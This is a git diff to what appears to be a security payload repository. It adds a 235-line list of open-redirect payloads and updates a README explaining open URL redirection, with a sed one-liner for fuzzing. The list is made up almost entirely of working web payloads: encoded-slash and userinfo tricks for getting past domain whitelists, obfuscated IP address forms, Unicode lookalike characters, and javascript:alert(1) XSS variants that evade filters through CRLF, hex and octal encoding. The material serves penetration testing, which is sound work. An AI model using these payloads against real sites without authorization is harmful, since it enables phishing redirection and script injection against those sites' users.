diff --git a/Open redirect/Open-Redirect-payloads.txt b/Open redirect/Open-Redirect-payloads.txt
new file mode 100644
index 00000000..6b456f1a
--- /dev/null
+++ b/Open redirect/Open-Redirect-payloads.txt	
@@ -0,0 +1,235 @@
+//google.com/%2f..
+//www.whitelisteddomain.tld@google.com/%2f..
+///google.com/%2f..
+///www.whitelisteddomain.tld@google.com/%2f..
+////google.com/%2f..
+////www.whitelisteddomain.tld@google.com/%2f..
+https://google.com/%2f..
+https://www.whitelisteddomain.tld@google.com/%2f..
+/https://google.com/%2f..
+/https://www.whitelisteddomain.tld@google.com/%2f..
+//www.google.com/%2f%2e%2e
+//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+///www.google.com/%2f%2e%2e
+///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+////www.google.com/%2f%2e%2e
+////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+https://www.google.com/%2f%2e%2e
+https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+/https://www.google.com/%2f%2e%2e
+/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+//google.com/
+//www.whitelisteddomain.tld@google.com/
+///google.com/
+///www.whitelisteddomain.tld@google.com/
+////google.com/
+////www.whitelisteddomain.tld@google.com/
+https://google.com/
+https://www.whitelisteddomain.tld@google.com/
+/https://google.com/
+/https://www.whitelisteddomain.tld@google.com/
+//google.com//
+//www.whitelisteddomain.tld@google.com//
+///google.com//
+///www.whitelisteddomain.tld@google.com//
+////google.com//
+////www.whitelisteddomain.tld@google.com//
+https://google.com//
+https://www.whitelisteddomain.tld@google.com//
+//https://google.com//
+//https://www.whitelisteddomain.tld@google.com//
+//www.google.com/%2e%2e%2f
+//www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
+///www.google.com/%2e%2e%2f
+///www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
+////www.google.com/%2e%2e%2f
+////www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
+https://www.google.com/%2e%2e%2f
+https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
+//https://www.google.com/%2e%2e%2f
+//https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
+///www.google.com/%2e%2e
+///www.whitelisteddomain.tld@www.google.com/%2e%2e
+////www.google.com/%2e%2e
+////www.whitelisteddomain.tld@www.google.com/%2e%2e
+https:///www.google.com/%2e%2e
+https:///www.whitelisteddomain.tld@www.google.com/%2e%2e
+//https:///www.google.com/%2e%2e
+//www.whitelisteddomain.tld@https:///www.google.com/%2e%2e
+/https://www.google.com/%2e%2e
+/https://www.whitelisteddomain.tld@www.google.com/%2e%2e
+///www.google.com/%2f%2e%2e
+///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+////www.google.com/%2f%2e%2e
+////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+https:///www.google.com/%2f%2e%2e
+https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+/https://www.google.com/%2f%2e%2e
+/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+/https:///www.google.com/%2f%2e%2e
+/https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+/%09/google.com
+/%09/www.whitelisteddomain.tld@google.com
+//%09/google.com
+//%09/www.whitelisteddomain.tld@google.com
+///%09/google.com
+///%09/www.whitelisteddomain.tld@google.com
+////%09/google.com
+////%09/www.whitelisteddomain.tld@google.com
+https://%09/google.com
+https://%09/www.whitelisteddomain.tld@google.com
+/%5cgoogle.com
+/%5cwww.whitelisteddomain.tld@google.com
+//%5cgoogle.com
+//%5cwww.whitelisteddomain.tld@google.com
+///%5cgoogle.com
+///%5cwww.whitelisteddomain.tld@google.com
+////%5cgoogle.com
+////%5cwww.whitelisteddomain.tld@google.com
+https://%5cgoogle.com
+https://%5cwww.whitelisteddomain.tld@google.com
+/https://%5cgoogle.com
+/https://%5cwww.whitelisteddomain.tld@google.com
+https://google.com
+https://www.whitelisteddomain.tld@google.com
+javascript:alert(1);
+javascript:alert(1)
+//javascript:alert(1);
+/javascript:alert(1);
+//javascript:alert(1)
+/javascript:alert(1)
+/%5cjavascript:alert(1);
+/%5cjavascript:alert(1)
+//%5cjavascript:alert(1);
+//%5cjavascript:alert(1)
+/%09/javascript:alert(1);
+/%09/javascript:alert(1)
+java%0d%0ascript%0d%0a:alert(0)
+//google.com
+https:google.com
+//google%E3%80%82com
+\/\/google.com/
+/\/google.com/
+//google%00.com
+https://www.whitelisteddomain.tld/https://www.google.com/
+";alert(0);//
+javascript://www.whitelisteddomain.tld?%a0alert%281%29
+http://0xd8.0x3a.0xd6.0xce
+http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
+http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
+http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
+http://0xd83ad6ce
+http://www.whitelisteddomain.tld@0xd83ad6ce
+http://3H6k7lIAiqjfNeN@0xd83ad6ce
+http://XY>.7d8T\205pZM@0xd83ad6ce
+http://3627734734
+http://www.whitelisteddomain.tld@3627734734
+http://3H6k7lIAiqjfNeN@3627734734
+http://XY>.7d8T\205pZM@3627734734
+http://472.314.470.462
+http://www.whitelisteddomain.tld@472.314.470.462
+http://3H6k7lIAiqjfNeN@472.314.470.462
+http://XY>.7d8T\205pZM@472.314.470.462
+http://0330.072.0326.0316
+http://www.whitelisteddomain.tld@0330.072.0326.0316
+http://3H6k7lIAiqjfNeN@0330.072.0326.0316
+http://XY>.7d8T\205pZM@0330.072.0326.0316
+http://00330.00072.0000326.00000316
+http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
+http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
+http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
+http://[::216.58.214.206]
+http://www.whitelisteddomain.tld@[::216.58.214.206]
+http://3H6k7lIAiqjfNeN@[::216.58.214.206]
+http://XY>.7d8T\205pZM@[::216.58.214.206]
+http://[::ffff:216.58.214.206]
+http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
+http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
+http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
+http://0xd8.072.54990
+http://www.whitelisteddomain.tld@0xd8.072.54990
+http://3H6k7lIAiqjfNeN@0xd8.072.54990
+http://XY>.7d8T\205pZM@0xd8.072.54990
+http://0xd8.3856078
+http://www.whitelisteddomain.tld@0xd8.3856078
+http://3H6k7lIAiqjfNeN@0xd8.3856078
+http://XY>.7d8T\205pZM@0xd8.3856078
+http://00330.3856078
+http://www.whitelisteddomain.tld@00330.3856078
+http://3H6k7lIAiqjfNeN@00330.3856078
+http://XY>.7d8T\205pZM@00330.3856078
+http://00330.0x3a.54990
+http://www.whitelisteddomain.tld@00330.0x3a.54990
+http://3H6k7lIAiqjfNeN@00330.0x3a.54990
+http://XY>.7d8T\205pZM@00330.0x3a.54990
+http:0xd8.0x3a.0xd6.0xce
+http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
+http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
+http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
+http:0xd83ad6ce
+http:www.whitelisteddomain.tld@0xd83ad6ce
+http:3H6k7lIAiqjfNeN@0xd83ad6ce
+http:XY>.7d8T\205pZM@0xd83ad6ce
+http:3627734734
+http:www.whitelisteddomain.tld@3627734734
+http:3H6k7lIAiqjfNeN@3627734734
+http:XY>.7d8T\205pZM@3627734734
+http:472.314.470.462
+http:www.whitelisteddomain.tld@472.314.470.462
+http:3H6k7lIAiqjfNeN@472.314.470.462
+http:XY>.7d8T\205pZM@472.314.470.462
+http:0330.072.0326.0316
+http:www.whitelisteddomain.tld@0330.072.0326.0316
+http:3H6k7lIAiqjfNeN@0330.072.0326.0316
+http:XY>.7d8T\205pZM@0330.072.0326.0316
+http:00330.00072.0000326.00000316
+http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
+http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
+http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
+http:[::216.58.214.206]
+http:www.whitelisteddomain.tld@[::216.58.214.206]
+http:3H6k7lIAiqjfNeN@[::216.58.214.206]
+http:XY>.7d8T\205pZM@[::216.58.214.206]
+http:[::ffff:216.58.214.206]
+http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
+http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
+http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
+http:0xd8.072.54990
+http:www.whitelisteddomain.tld@0xd8.072.54990
+http:3H6k7lIAiqjfNeN@0xd8.072.54990
+http:XY>.7d8T\205pZM@0xd8.072.54990
+http:0xd8.3856078
+http:www.whitelisteddomain.tld@0xd8.3856078
+http:3H6k7lIAiqjfNeN@0xd8.3856078
+http:XY>.7d8T\205pZM@0xd8.3856078
+http:00330.3856078
+http:www.whitelisteddomain.tld@00330.3856078
+http:3H6k7lIAiqjfNeN@00330.3856078
+http:XY>.7d8T\205pZM@00330.3856078
+http:00330.0x3a.54990
+http:www.whitelisteddomain.tld@00330.0x3a.54990
+http:3H6k7lIAiqjfNeN@00330.0x3a.54990
+http:XY>.7d8T\205pZM@00330.0x3a.54990
+〱google.com
+〵google.com
+ゝgoogle.com
+ーgoogle.com
+ｰgoogle.com
+/〱google.com
+/〵google.com
+/ゝgoogle.com
+/ーgoogle.com
+/ｰgoogle.com
+%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
+http://%67%6f%6f%67%6c%65%2e%63%6f%6d
+<>javascript:alert(1);
+<>//google.com
+//google.com\@www.whitelisteddomain.tld
+https://:@google.com\@www.whitelisteddomain.tld
+\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
+\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
+ja\nva\tscript\r:alert(1)
+\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
+\152\141\166\141\163\143\162\151\160\164\072alert(1)
+http://google.com:80#@www.whitelisteddomain.tld/
+http://google.com:80?@www.whitelisteddomain.tld/
diff --git a/Open redirect/README.md b/Open redirect/README.md
index e72b6c8d..9ce04887 100644
--- a/Open redirect/README.md	
+++ b/Open redirect/README.md	
@@ -1,7 +1,15 @@
 # Open URL Redirection
-Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.	
+Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.
 
-## Exploits
+## Fuzzing
+Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case
+
+To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your test case URL.
+```
+WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
+```
+
+## Exploitation
 
 Using CRLF to bypass "javascript" blacklisted keyword
 ```
@@ -21,7 +29,7 @@ https:google.com
 Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
 ```
 \/\/google.com/
-/\/google.com/ 
+/\/google.com/
 ```
 
 
@@ -66,4 +74,5 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
 
 ## Thanks to
 * filedescriptor
-* https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
\ No newline at end of file
+* https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
+* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)